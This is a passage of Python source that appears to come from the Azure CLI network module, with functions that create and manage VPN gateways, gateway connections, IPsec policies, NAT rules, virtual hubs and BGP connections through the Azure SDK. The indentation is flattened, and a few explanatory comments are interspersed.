aux_subscription = parse_resource_id(peering.remote_virtual_network.id)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
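# list_available_ips asks the service whether the first address of the VNet's first prefix is
# available; the available_ip_addresses field of the response then serves as a sample list of
# free addresses in the virtual network.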
def list_available_ips(cmd, resource_group_name, virtual_network_name):
client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet = client.get(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name)
start_ip = vnet.address_space.address_prefixes[0].split('/')[0]
available_ips = client.check_ip_address_availability(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
ip_address=start_ip)
return available_ips.available_ip_addresses
# endregion
# region VirtualNetworkGateways
def create_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, public_cert_data, cert_name):
VpnClientRootCertificate = cmd.get_models('VpnClientRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
raise CLIError("Must add address prefixes to gateway '{}' prior to adding a root cert."
.format(gateway_name))
config = gateway.vpn_client_configuration
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
cert = VpnClientRootCertificate(name=cert_name, public_cert_data=public_cert_data)
upsert_to_collection(config, 'vpn_client_root_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_root_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_root_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def create_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, thumbprint, cert_name):
VpnClientRevokedCertificate = cmd.get_models('VpnClientRevokedCertificate')
config, gateway, ncf = _prep_cert_create(cmd, gateway_name, resource_group_name)
cert = VpnClientRevokedCertificate(name=cert_name, thumbprint=thumbprint)
upsert_to_collection(config, 'vpn_client_revoked_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_revoked_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_revoked_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def _prep_cert_create(cmd, gateway_name, resource_group_name):
VpnClientConfiguration = cmd.get_models('VpnClientConfiguration')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
gateway.vpn_client_configuration = VpnClientConfiguration()
config = gateway.vpn_client_configuration
if not config.vpn_client_address_pool or not config.vpn_client_address_pool.address_prefixes:
raise CLIError('Address prefixes must be set on VPN gateways before adding'
' certificates. Please use "update" with --address-prefixes first.')
if config.vpn_client_revoked_certificates is None:
config.vpn_client_revoked_certificates = []
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
return config, gateway, ncf
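# create_vnet_gateway infers active-active mode from the number of public IPs supplied (two IPs ->
# active-active, one IP -> active-standby) and always places the gateway IP configurations on the
# dedicated 'GatewaySubnet' of the given virtual network.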
def create_vnet_gateway(cmd, resource_group_name, virtual_network_gateway_name, public_ip_address,
virtual_network, location=None, tags=None,
no_wait=False, gateway_type=None, sku=None, vpn_type=None, vpn_gateway_generation=None,
asn=None, bgp_peering_address=None, peer_weight=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None, edge_zone=None,
nat_rule=None):
(VirtualNetworkGateway, BgpSettings, SubResource, VirtualNetworkGatewayIPConfiguration, VirtualNetworkGatewaySku,
VpnClientConfiguration, AddressSpace, VpnClientRootCertificate, VirtualNetworkGatewayNatRule,
VpnNatRuleMapping) = cmd.get_models(
'VirtualNetworkGateway', 'BgpSettings', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VirtualNetworkGatewaySku', 'VpnClientConfiguration', 'AddressSpace', 'VpnClientRootCertificate',
'VirtualNetworkGatewayNatRule', 'VpnNatRuleMapping')
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
subnet = virtual_network + '/subnets/GatewaySubnet'
active = len(public_ip_address) == 2
vnet_gateway = VirtualNetworkGateway(
gateway_type=gateway_type, vpn_type=vpn_type, vpn_gateway_generation=vpn_gateway_generation, location=location,
tags=tags, sku=VirtualNetworkGatewaySku(name=sku, tier=sku), active=active, ip_configurations=[],
gateway_default_site=SubResource(id=gateway_default_site) if gateway_default_site else None)
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic',
name='vnetGatewayConfig{}'.format(i)
)
vnet_gateway.ip_configurations.append(ip_configuration)
if asn or bgp_peering_address or peer_weight:
vnet_gateway.enable_bgp = True
vnet_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
if any((address_prefixes, client_protocol)):
vnet_gateway.vpn_client_configuration = VpnClientConfiguration()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
vnet_gateway.vpn_client_configuration.vpn_client_protocols = client_protocol
if any((radius_secret, radius_server)) and cmd.supported_api_version(min_api='2017-06-01'):
vnet_gateway.vpn_client_configuration.radius_server_address = radius_server
vnet_gateway.vpn_client_configuration.radius_server_secret = radius_secret
# multi authentication
if cmd.supported_api_version(min_api='2020-11-01'):
vnet_gateway.vpn_client_configuration.vpn_authentication_types = vpn_auth_type
vnet_gateway.vpn_client_configuration.aad_tenant = aad_tenant
vnet_gateway.vpn_client_configuration.aad_issuer = aad_issuer
vnet_gateway.vpn_client_configuration.aad_audience = aad_audience
vnet_gateway.vpn_client_configuration.vpn_client_root_certificates = [
VpnClientRootCertificate(name=root_cert_name,
public_cert_data=root_cert_data)] if root_cert_data else None
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
vnet_gateway.custom_routes = AddressSpace()
vnet_gateway.custom_routes.address_prefixes = custom_routes
if edge_zone:
vnet_gateway.extended_location = _edge_zone_model(cmd, edge_zone)
if nat_rule:
vnet_gateway.nat_rules = [
VirtualNetworkGatewayNatRule(type_properties_type=rule.get('type'), mode=rule.get('mode'), name=rule.get('name'),
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('internal_mappings')] if rule.get('internal_mappings') else None,
external_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('external_mappings')] if rule.get('external_mappings') else None,
ip_configuration_id=rule.get('ip_config_id')) for rule in nat_rule]
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, virtual_network_gateway_name, vnet_gateway)
def update_vnet_gateway(cmd, instance, sku=None, vpn_type=None, tags=None,
public_ip_address=None, gateway_type=None, enable_bgp=None,
asn=None, bgp_peering_address=None, peer_weight=None, virtual_network=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None):
(AddressSpace, SubResource, VirtualNetworkGatewayIPConfiguration, VpnClientConfiguration,
VpnClientRootCertificate) = cmd.get_models('AddressSpace', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VpnClientConfiguration', 'VpnClientRootCertificate')
if any((address_prefixes, radius_server, radius_secret, client_protocol)) and not instance.vpn_client_configuration:
instance.vpn_client_configuration = VpnClientConfiguration()
if address_prefixes is not None:
if not instance.vpn_client_configuration.vpn_client_address_pool:
instance.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
if not instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes:
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = []
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
with cmd.update_context(instance.vpn_client_configuration) as c:
c.set_param('vpn_client_protocols', client_protocol)
c.set_param('radius_server_address', radius_server)
c.set_param('radius_server_secret', radius_secret)
if cmd.supported_api_version(min_api='2020-11-01'):
c.set_param('aad_tenant', aad_tenant)
c.set_param('aad_audience', aad_audience)
c.set_param('aad_issuer', aad_issuer)
c.set_param('vpn_authentication_types', vpn_auth_type)
if root_cert_data and cmd.supported_api_version(min_api='2020-11-01'):
upsert_to_collection(instance.vpn_client_configuration, 'vpn_client_root_certificates',
VpnClientRootCertificate(name=root_cert_name, public_cert_data=root_cert_data), 'name')
with cmd.update_context(instance.sku) as c:
c.set_param('name', sku)
c.set_param('tier', sku)
with cmd.update_context(instance) as c:
c.set_param('gateway_default_site', SubResource(id=gateway_default_site) if gateway_default_site else None)
c.set_param('vpn_type', vpn_type)
c.set_param('tags', tags)
subnet_id = '{}/subnets/GatewaySubnet'.format(virtual_network) if virtual_network else \
instance.ip_configurations[0].subnet.id
if virtual_network is not None:
for config in instance.ip_configurations:
config.subnet.id = subnet_id
if public_ip_address is not None:
instance.ip_configurations = []
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet_id),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic', name='vnetGatewayConfig{}'.format(i))
instance.ip_configurations.append(ip_configuration)
# Update active-active/active-standby status
active = len(public_ip_address) == 2
if instance.active and not active:
logger.info('Placing gateway in active-standby mode.')
elif not instance.active and active:
logger.info('Placing gateway in active-active mode.')
instance.active = active
if gateway_type is not None:
instance.gateway_type = gateway_type
if enable_bgp is not None:
instance.enable_bgp = enable_bgp.lower() == 'true'
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
if not instance.custom_routes:
instance.custom_routes = AddressSpace()
instance.custom_routes.address_prefixes = custom_routes
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
return instance
def start_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def stop_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def generate_vpn_client(cmd, client, resource_group_name, virtual_network_gateway_name, processor_architecture=None,
authentication_method=None, radius_server_auth_certificate=None, client_root_certificates=None,
use_legacy=False):
params = cmd.get_models('VpnClientParameters')(
processor_architecture=processor_architecture
)
if cmd.supported_api_version(min_api='2017-06-01') and not use_legacy:
params.authentication_method = authentication_method
params.radius_server_auth_certificate = radius_server_auth_certificate
params.client_root_certificates = client_root_certificates
return client.begin_generate_vpn_profile(resource_group_name, virtual_network_gateway_name, params)
# legacy implementation
return client.begin_generatevpnclientpackage(resource_group_name, virtual_network_gateway_name, params)
def set_vpn_client_ipsec_policy(cmd, client, resource_group_name, virtual_network_gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
VpnClientIPsecParameters = cmd.get_models('VpnClientIPsecParameters')
vpnclient_ipsec_params = VpnClientIPsecParameters(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
return sdk_no_wait(no_wait, client.begin_set_vpnclient_ipsec_parameters, resource_group_name,
virtual_network_gateway_name, vpnclient_ipsec_params)
def disconnect_vnet_gateway_vpn_connections(cmd, client, resource_group_name, virtual_network_gateway_name,
vpn_connection_ids, no_wait=False):
P2SVpnConnectionRequest = cmd.get_models('P2SVpnConnectionRequest')
request = P2SVpnConnectionRequest(vpn_connection_ids=vpn_connection_ids)
return sdk_no_wait(no_wait, client.begin_disconnect_virtual_network_gateway_vpn_connections,
resource_group_name, virtual_network_gateway_name, request)
# endregion
# region VirtualNetworkGatewayConnections
# pylint: disable=too-many-locals
def create_vpn_connection(cmd, resource_group_name, connection_name, vnet_gateway1,
location=None, tags=None, no_wait=False, validate=False,
vnet_gateway2=None, express_route_circuit2=None, local_gateway2=None,
authorization_key=None, enable_bgp=False, routing_weight=10,
connection_type=None, shared_key=None,
use_policy_based_traffic_selectors=False,
express_route_gateway_bypass=None, ingress_nat_rule=None, egress_nat_rule=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import build_vpn_connection_resource
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
tags = tags or {}
# Build up the ARM template
master_template = ArmTemplateBuilder()
vpn_connection_resource = build_vpn_connection_resource(
cmd, connection_name, location, tags, vnet_gateway1,
vnet_gateway2 or local_gateway2 or express_route_circuit2,
connection_type, authorization_key, enable_bgp, routing_weight, shared_key,
use_policy_based_traffic_selectors, express_route_gateway_bypass, ingress_nat_rule, egress_nat_rule)
master_template.add_resource(vpn_connection_resource)
master_template.add_output('resource', connection_name, output_type='object')
if shared_key:
master_template.add_secure_parameter('sharedKey', shared_key)
if authorization_key:
master_template.add_secure_parameter('authorizationKey', authorization_key)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'vpn_connection_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
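# Hedged sketch of the flow in create_vpn_connection above (no new behaviour implied):
#   1. build_vpn_connection_resource(...) assembles the connection resource for the ARM template,
#   2. shared/authorization keys are passed as secure template parameters,
#   3. with --validate the template is only validated (begin_validate or validate, depending on
#      the resource API version); otherwise it is deployed via sdk_no_wait(begin_create_or_update).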
def update_vpn_connection(cmd, instance, routing_weight=None, shared_key=None, tags=None,
enable_bgp=None, use_policy_based_traffic_selectors=None,
express_route_gateway_bypass=None):
with cmd.update_context(instance) as c:
c.set_param('routing_weight', routing_weight)
c.set_param('shared_key', shared_key)
c.set_param('tags', tags)
c.set_param('enable_bgp', enable_bgp)
c.set_param('express_route_gateway_bypass', express_route_gateway_bypass)
c.set_param('use_policy_based_traffic_selectors', use_policy_based_traffic_selectors)
# TODO: Remove these when issue #1615 is fixed
gateway1_id = parse_resource_id(instance.virtual_network_gateway1.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway1_id['subscription'])
instance.virtual_network_gateway1 = ncf.virtual_network_gateways.get(
gateway1_id['resource_group'], gateway1_id['name'])
if instance.virtual_network_gateway2:
gateway2_id = parse_resource_id(instance.virtual_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.virtual_network_gateway2 = ncf.virtual_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
if instance.local_network_gateway2:
gateway2_id = parse_resource_id(instance.local_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.local_network_gateway2 = ncf.local_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
return instance
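# Hedged note: the parse_resource_id helper used above returns a dict keyed by resource-id
# segments, e.g. {'subscription': '<sub-id>', 'resource_group': '<rg>', 'name': '<gateway>'},
# which is what lets the workaround re-fetch each gateway from its own subscription.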
def list_vpn_connections(cmd, resource_group_name, virtual_network_gateway_name=None):
if virtual_network_gateway_name:
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
return client.list_connections(resource_group_name, virtual_network_gateway_name)
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
return client.list(resource_group_name)
def start_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def stop_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def show_vpn_connection_device_config_script(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
vendor, device_family, firmware_version):
VpnDeviceScriptParameters = cmd.get_models('VpnDeviceScriptParameters')
parameters = VpnDeviceScriptParameters(
vendor=vendor,
device_family=device_family,
firmware_version=firmware_version
)
return client.vpn_device_configuration_script(resource_group_name, virtual_network_gateway_connection_name,
parameters=parameters)
# endregion
# region IPSec Policy Commands
def add_vnet_gateway_ipsec_policy(cmd, resource_group_name, gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
if gateway.vpn_client_configuration.vpn_client_ipsec_policies:
gateway.vpn_client_configuration.vpn_client_ipsec_policies.append(new_policy)
else:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = [new_policy]
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def clear_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = None
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
return LongRunningOperation(cmd.cli_ctx)(poller).vpn_client_configuration.vpn_client_ipsec_policies
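# Hedged note: when --no-wait is not set, the poller from begin_create_or_update is resolved
# with LongRunningOperation so the command returns the gateway's resulting
# vpn_client_ipsec_policies value instead of the raw poller object.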
def list_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
try:
return ncf.get(resource_group_name, gateway_name).vpn_client_configuration.vpn_client_ipsec_policies
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
def add_vpn_conn_ipsec_policy(cmd, client, resource_group_name, connection_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
conn = client.get(resource_group_name, connection_name)
if conn.ipsec_policies:
conn.ipsec_policies.append(new_policy)
else:
conn.ipsec_policies = [new_policy]
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
def clear_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name, no_wait=False):
conn = client.get(resource_group_name, connection_name)
conn.ipsec_policies = None
conn.use_policy_based_traffic_selectors = False
if no_wait:
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
return LongRunningOperation(cmd.cli_ctx)(poller).ipsec_policies
def list_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name):
return client.get(resource_group_name, connection_name).ipsec_policies
def assign_vnet_gateway_aad(cmd, resource_group_name, gateway_name,
aad_tenant, aad_audience, aad_issuer, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = aad_tenant
gateway.vpn_client_configuration.aad_audience = aad_audience
gateway.vpn_client_configuration.aad_issuer = aad_issuer
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_aad(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
return gateway.vpn_client_configuration
def remove_vnet_gateway_aad(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = None
gateway.vpn_client_configuration.aad_audience = None
gateway.vpn_client_configuration.aad_issuer = None
if cmd.supported_api_version(min_api='2020-11-01'):
gateway.vpn_client_configuration.vpn_authentication_types = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def add_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, internal_mappings, external_mappings,
rule_type=None, mode=None, ip_config_id=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
VirtualNetworkGatewayNatRule, VpnNatRuleMapping = cmd.get_models('VirtualNetworkGatewayNatRule',
'VpnNatRuleMapping')
gateway.nat_rules.append(
VirtualNetworkGatewayNatRule(type_properties_type=rule_type, mode=mode, name=name,
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in internal_mappings] if internal_mappings else None,
external_mappings=[VpnNatRuleMapping(address_space=e_map) for e_map in external_mappings] if external_mappings else None,
ip_configuration_id=ip_config_id))
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
return gateway.nat_rules
def remove_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
for rule in gateway.nat_rules:
if name == rule.name:
gateway.nat_rules.remove(rule)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
    raise UnrecognizedArgumentError(f'NAT rule "{name}" was not found on gateway "{gateway_name}".')
# endregion
# region VirtualHub
def create_virtual_hub(cmd, client,
resource_group_name,
virtual_hub_name,
hosted_subnet,
public_ip_address=None,
location=None,
tags=None):
from azure.core.exceptions import HttpResponseError
from azure.cli.core.commands import LongRunningOperation
try:
client.get(resource_group_name, virtual_hub_name)
        raise CLIError('The VirtualHub "{}" under resource group "{}" already exists'.format(
            virtual_hub_name, resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location,
virtual_wan=None,
sku='Standard')
vhub_poller = client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
ip_config = HubIpConfiguration(
subnet=SubResource(id=hosted_subnet),
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(
resource_group_name, virtual_hub_name, 'Default', ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
try:
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
except HttpResponseError:
pass
client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return client.get(resource_group_name, virtual_hub_name)
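# Hedged summary of create_virtual_hub above: the hub and its 'Default' IP configuration are
# created as two separate long-running operations; if the second step fails, both the IP
# configuration and the hub are deleted before the exception is re-raised, so a half-created
# hub is not left behind.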
def virtual_hub_update_setter(client, resource_group_name, virtual_hub_name, parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, parameters)
def update_virtual_hub(cmd, instance,
tags=None,
allow_branch_to_branch_traffic=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('allow_branch_to_branch_traffic', allow_branch_to_branch_traffic)
return instance
def delete_virtual_hub(cmd, client, resource_group_name, virtual_hub_name, no_wait=False):
from azure.cli.core.commands import LongRunningOperation
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
ip_configs = list(vhub_ip_config_client.list(resource_group_name, virtual_hub_name))
if ip_configs:
ip_config = ip_configs[0] # There will always be only 1
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, ip_config.name)
LongRunningOperation(cmd.cli_ctx)(poller)
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name)
def list_virtual_hub(client, resource_group_name=None):
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_virtual_hub_bgp_connection(cmd, client, resource_group_name, virtual_hub_name, connection_name,
peer_asn, peer_ip, no_wait=False):
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=connection_name, peer_asn=peer_asn, peer_ip=peer_ip)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name,
virtual_hub_name, connection_name, vhub_bgp_conn)
def virtual_hub_bgp_connection_update_setter(client, resource_group_name,
virtual_hub_name, connection_name,
parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, connection_name, parameters)
def update_virtual_hub_bgp_connection(cmd, instance, peer_asn=None, peer_ip=None):
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def delete_virtual_hub_bgp_connection(client, resource_group_name,
virtual_hub_name, connection_name, no_wait=False):
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_learned_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_learned_routes(resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_advertised_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_advertised_routes(resource_group_name, virtual_hub_name, connection_name)
# endregion
# region VirtualRouter
def create_virtual_router(cmd,
resource_group_name,
virtual_router_name,
hosted_gateway=None,
hosted_subnet=None,
location=None,
tags=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
